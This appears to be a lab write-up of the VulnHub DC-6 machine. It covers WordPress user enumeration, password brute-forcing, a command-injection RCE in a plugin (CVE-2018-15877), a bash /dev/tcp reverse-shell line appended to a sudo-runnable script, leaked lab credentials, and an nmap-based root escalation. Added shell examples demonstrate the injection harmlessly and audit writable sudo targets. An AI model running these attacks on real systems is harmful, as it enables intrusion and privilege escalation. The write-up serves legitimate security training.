DC-6 starts off by enumerating usernames from a WordPress website. I'm able to gain a set of credentials to log into the admin panel with a brute-force attack. There is a WP plugin which can be leveraged to gain a foothold on the system. A to-do note containing the user's credentials is discovered while enumerating the home directory. For the root part, there are sudo privileges on a writable backup script and on nmap, which allow me to escalate to another user and then straight to root.
Host Discovery — arpscan
Because 192.168.2.1 and 192.168.2.2 are virtual gateway addresses, the target machine's IP address is most likely
arp-scan --interface eth0 '192.168.2.0/24' | tee scans/00-arp-scan-dc6
The initial nmap scan shows two open ports: SSH on 22 and an Apache web server on 80.
nmap -n -sC -sV -oA scans/10-initial-dc6 '192.168.2.104' -v
From the results above, port 80 redirects to http://wordy/. To make that hostname resolve, I'll add wordy to my /etc/hosts file:
echo '192.168.2.104 wordy' >> /etc/hosts
TCP 80 — Website
This page clearly states that it's a WordPress site. There's nothing interesting to explore here, but the text about secure plugins seems to be a hint from the machine's author.
— :: Nmap NSE
Running nmap's http-wordpress NSE scripts against this website finds several usernames.
nmap -p 80 --script "http-wordpress*" wordy
I'll save those usernames into a file called users.
— :: WPScan
wpscan identifies two vulnerable WP plugins: one with an RCE and one with a user-role privilege escalation.
wpscan --url http://wordy/ --enumerate vp --plugins-detection aggressive --api-token your_token123
I'm interested in the RCE one, but before that I'll have to find credentials.
At that time, I was stuck for a couple of hours. I asked for a nudge, and the answer was to brute force; I didn't know that the box's author had actually given us a hint to create a custom wordlist from rockyou.txt.
I'll create a new wordlist from rockyou.txt and then use it to perform a brute-force attack with wpscan:
wpscan --url http://wordy/ --usernames users --passwords passwords.txt
It returns one valid set of credentials:
Plainview Activity Monitor — RCE (CVE-2018-15877)
With the credentials I obtained, I can log in to the WP dashboard. Starting from the previous wpscan output, I searched for an exploit PoC for the Plainview Activity Monitor RCE and found this one on exploit-db.
The PoC exploits a vulnerability in the plugin's IP tools feature. I'll hit the lookup button and intercept the request in Burp. RCE can be achieved by appending OS commands to the ip field after a pipe (|), a semicolon (; stacked commands) or a logical OR (||), because the value is handed to a shell as part of a command string. In this case, I send a reverse shell.
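To make the injection point concrete, here is an added example of my own (not code from the writeup or from the plugin). It assumes, as the PoC does, that the plugin pastes the ip field into a ping-style command string that a shell parses. A stub ping that prints one line and exits 1 (an unreachable host) stands in for the real lookup so the script runs offline, and "echo INJECTED" stands in for the reverse shell. The hardened variant shows the two fixes that close the hole: an allow-list check on the value and passing it as a single argument instead of through sh -c.

```sh
#!/bin/sh
# Added example, not from the writeup or the plugin.
# Stub lookup tool (constructed): behaves like ping to an unreachable host.
STUBDIR=$(mktemp -d)
trap 'rm -rf "$STUBDIR"' EXIT
printf '#!/bin/sh\necho "PING $1: host unreachable"\nexit 1\n' > "$STUBDIR/ping"
chmod 0755 "$STUBDIR/ping"

# Vulnerable pattern (assumed plugin behaviour): the user-controlled value is
# interpolated into a string that sh parses, so |, ; and || keep their meaning.
lookup_vuln() {
  PATH="$STUBDIR:$PATH" sh -c "ping $1" 2>/dev/null
}

# Allow-list check: a dotted quad with every octet in 0-255 and nothing else.
is_ipv4() {
  printf '%s' "$1" | grep -Eq \
    '^((25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])\.){3}(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])$'
}

# Hardened pattern: validate first, then pass the value as ONE argument.
# No string reaches sh, so metacharacters are inert even if the check were bypassed.
lookup_safe() {
  is_ipv4 "$1" || { echo "rejected: $1" >&2; return 1; }
  PATH="$STUBDIR:$PATH" ping "$1"
}

# Returns 0 when the injected marker shows up in the vulnerable lookup's output.
injected() {
  lookup_vuln "$1" | grep -q '^INJECTED$'
}

# Walk the three separators from the writeup; "||" fires because the stub lookup fails,
# exactly as ping against a bogus address would.
demo() {
  for sep in '|' ';' '||'; do
    payload="203.0.113.1 $sep echo INJECTED"
    if injected "$payload"; then echo "vulnerable lookup ran payload via '$sep'"; fi
    lookup_safe "$payload" 2>/dev/null || echo "hardened lookup blocked payload via '$sep'"
  done
}
```

Run `demo` to see each separator succeed against lookup_vuln and fail against lookup_safe; the same check and argument-passing discipline applies to any web feature that shells out with user input.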
The home directory is readable by www-data and there are two interesting files:
I immediately checked the contents of both. The backups.sh script is writable by group devs, which I note for later. things-to-do.txt contains graham's credentials.
SSH — Graham
I tried graham's creds, graham:GSo7isUM1D4, on SSH, and it worked.
Shell as jens via sudo backups.sh
graham has sudo privileges on the backups.sh script, which allows him to run it as user jens. Because the script is also writable by graham (via the devs group), I can escalate to jens by appending a reverse shell line to the script and then running it with sudo.
graham@dc-6:~$ echo 'bash -i >& /dev/tcp/192.168.2.108/9000 0>&1' >> /home/jens/backups.sh
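The graham to jens step is a general pattern: a sudo rule pointing at a file the caller can modify. As an added example (mine, not from the writeup), the script below takes the text of `sudo -l`, extracts the command paths from its "(runas) ..." lines and reports those the current user can write to. The `sudo -l` text inside demo() is constructed sample input modelled on the box, not its real output, and the files it points at are scratch files created for the run.

```sh
#!/bin/sh
# Added example, not from the writeup. Finds sudo targets the current user can also edit.

# Pull absolute paths out of the "(runas) [NOPASSWD:] /path, /path" lines of sudo -l.
# Lines such as secure_path=... are skipped because they do not start with "(".
sudo_l_paths() {
  printf '%s\n' "$1" | grep -E '^[[:space:]]*\(' | grep -oE '/[^[:space:],]+'
}

# Print each sudo target that the caller can write to. Run this as the low-privileged
# user whose rules you are auditing: as root every file reports as writable.
writable_sudo_targets() {
  sudo_l_paths "$1" | while IFS= read -r p; do
    if [ -w "$p" ]; then printf '%s\n' "$p"; fi
  done
}

demo() {
  # Scratch copy of the scenario (constructed): a group-writable script, a read-only binary.
  dir=$(mktemp -d)
  printf '#!/bin/bash\n# constructed placeholder for backups.sh\n' > "$dir/backups.sh"
  chmod 0775 "$dir/backups.sh"
  : > "$dir/nmap"
  chmod 0555 "$dir/nmap"
  sample="Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: $dir/backups.sh
    (root) NOPASSWD: $dir/nmap"
  writable_sudo_targets "$sample"
  rm -rf "$dir"
}
```

On a real host, feed it live output with `writable_sudo_targets "$(sudo -l 2>/dev/null)"`; any path it prints can be backdoored the way backups.sh was above, and any path it does not print still needs a GTFOBins-style check of the binary itself.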
Shell as root via sudo nmap
I found out that user jens is allowed to execute nmap as root. I can exploit this using the nmap entry on GTFOBins: --script accepts a path to an arbitrary Lua file, which nmap then runs as root.
jens@dc-6:/home/graham$ TF=$(mktemp)
jens@dc-6:/home/graham$ echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:/home/graham$ sudo nmap --script=$TF
And here is the flag:
Originally published at: https://fahmifj.github.io/writeups/vulnhub/vh-dc6/